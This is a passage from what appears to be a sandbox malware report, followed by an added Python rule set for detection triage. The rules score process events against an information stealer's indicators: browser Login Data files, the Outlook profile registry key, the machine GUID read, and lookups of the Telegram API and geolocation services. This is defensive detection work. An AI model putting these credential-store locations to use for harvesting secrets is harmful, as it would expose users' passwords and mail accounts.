                      signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                    schtasks.exe (1)
                      conhost.exe
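The evidence lines above (browser Login Data opens, the Outlook profile key, the MachineGuid read, the root\SecurityCenter2 AntiVirusProduct WMI query) together with the network contacts in the behavior graph (checkip.dyndns.com, reallyfreegeoip.org, api.telegram.org) are exactly the host-level indicators a detection engineer would turn into triage rules. The following is an added example, not part of the Joe Sandbox report: a small rule set that scores per-process events against those indicators. The event records are constructed to mirror the report's evidence lines in a simplified shape (real Sysmon or EDR telemetry would need an adapter), the benign chrome.exe event is invented for contrast, the allow-listed browser and Defender image paths are the editor's assumptions, and the ATT&CK technique IDs are the editor's mapping, not something the report states.

```python
"""Triage rules for the indicators this report records (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str            # wording taken from the report's own signature list
    kind: str            # event kind the rule inspects
    pattern: str         # regex over the event target
    technique: str       # ATT&CK technique: editor's mapping, not stated by the report
    allowed: tuple = ()  # images expected to touch this target (assumption)


# Assumed benign images for the two noisy indicators (browsers read their own
# Login Data; Defender's own CLI queries SecurityCenter2, as the report shows).
BROWSER_IMAGES = (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                  r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe")
DEFENDER_CLI = (r"C:\Program Files\Windows Defender\MpCmdRun.exe",)

RULES = (
    Rule("Tries to harvest and steal browser information (history, passwords, etc)",
         "file_open", r"\\User Data\\[^\\]+\\Login Data$", "T1555.003", BROWSER_IMAGES),
    Rule("Tries to steal Mail credentials (via file / registry access)",
         "reg_open", r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "T1552.002"),
    Rule("Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)",
         "wmi_query", r"^root\\SecurityCenter2 : AntiVirusProduct$", "T1518.001", DEFENDER_CLI),
    Rule("Queries the machine GUID (host fingerprint)",
         "reg_query", r"\\Microsoft\\Cryptography\\MachineGuid$", "T1082"),
    Rule("Uses the Telegram API (likely for C&C communication)",
         "dns", r"^api\.telegram\.org$", "T1102"),
)

# Resolving both of these from one process is what the report flags as
# detecting the analysis system's country by its public IP.
GEOIP_PAIR = ("checkip.dyndns.com", "reallyfreegeoip.org")

# Constructed events mirroring the report's evidence lines (not real telemetry).
SAMPLE_EVENTS = [
    {"kind": "file_open", "process": r"C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "file_open", "process": r"C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"kind": "reg_open", "process": r"C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"kind": "reg_open", "process": r"C:\Users\user\Desktop\UOEAjWmusE.exe",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"kind": "reg_query", "process": r"C:\Users\user\Desktop\UOEAjWmusE.exe",
     "target": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid"},
    {"kind": "wmi_query", "process": r"C:\Users\user\Desktop\UOEAjWmusE.exe",
     "target": r"root\SecurityCenter2 : AntiVirusProduct"},
    {"kind": "wmi_query", "process": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "target": r"root\SecurityCenter2 : AntiVirusProduct"},
    {"kind": "dns", "process": r"C:\Users\user\Desktop\UOEAjWmusE.exe", "target": "checkip.dyndns.com"},
    {"kind": "dns", "process": r"C:\Users\user\Desktop\UOEAjWmusE.exe", "target": "reallyfreegeoip.org"},
    {"kind": "dns", "process": r"C:\Users\user\Desktop\UOEAjWmusE.exe", "target": "api.telegram.org"},
    # Invented benign contrast: the browser itself reading its own credential store.
    {"kind": "file_open", "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]


def rule_hits(event):
    """Return the rules an event matches, skipping allow-listed images."""
    return [r for r in RULES
            if event["kind"] == r.kind
            and re.search(r.pattern, event["target"])
            and event["process"] not in r.allowed]


def triage(events):
    """Group findings per process image: {image: {technique: [targets]}}."""
    findings = defaultdict(lambda: defaultdict(list))
    dns_seen = defaultdict(set)
    for ev in events:
        for rule in rule_hits(ev):
            findings[ev["process"]][rule.technique].append(ev["target"])
        if ev["kind"] == "dns":
            dns_seen[ev["process"]].add(ev["target"].lower())
    # Correlation rule: the IP-then-geolocation pair from a single process.
    for image, names in dns_seen.items():
        if all(d in names for d in GEOIP_PAIR):
            findings[image]["T1614"].extend(GEOIP_PAIR)
    return {img: dict(techs) for img, techs in findings.items()}


def verdict(techniques):
    """Escalate when credential theft coincides with C2 or geo-check activity."""
    techs = set(techniques)
    cred = bool(techs & {"T1555.003", "T1552.002"})
    c2 = bool(techs & {"T1102", "T1614"})
    if cred and c2:
        return "high"
    if cred or c2:
        return "medium"
    return "low" if techs else "none"


if __name__ == "__main__":
    for image, techs in triage(SAMPLE_EVENTS).items():
        print(f"{verdict(techs):6} {image}")
        for tech, targets in techs.items():
            print(f"       {tech}: {len(targets)} hit(s)")
```

Run stand-alone it prints one line per flagged image; chrome.exe and MpCmdRun.exe produce no findings because of the allow list, the dropped gJdonuKfIrqN.exe scores "medium" on credential access alone, and UOEAjWmusE.exe scores "high" because the Outlook key access is combined with the Telegram lookup and the geolocation pair. The allow list is the part to tune: it is where false negatives hide if an attacker injects into the browser process, which is why the report's "Injects a PE file into a foreign processes" signature should be correlated separately rather than folded into these rules.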
